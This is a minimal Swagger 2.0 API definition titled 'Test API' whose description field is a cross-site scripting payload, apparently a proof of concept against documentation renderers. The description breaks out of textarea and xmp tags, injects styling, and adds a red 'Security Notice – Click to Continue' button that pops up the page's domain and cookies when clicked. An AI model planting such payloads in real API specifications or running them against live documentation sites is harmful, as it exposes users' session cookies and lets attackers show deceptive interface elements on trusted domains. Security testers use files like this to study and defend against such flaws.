swagger: '2.0'
info:
  title: Test API
  description: |-
    </textarea></xmp>
    <style>button {background:red; color:white; padding:12px;}</style>
    <button onclick="alert(document.domain + '\nCookie: ' + document.cookie)">
      Security Notice – Click to Continue
    </button>
  version: 1.0.0
paths: {}
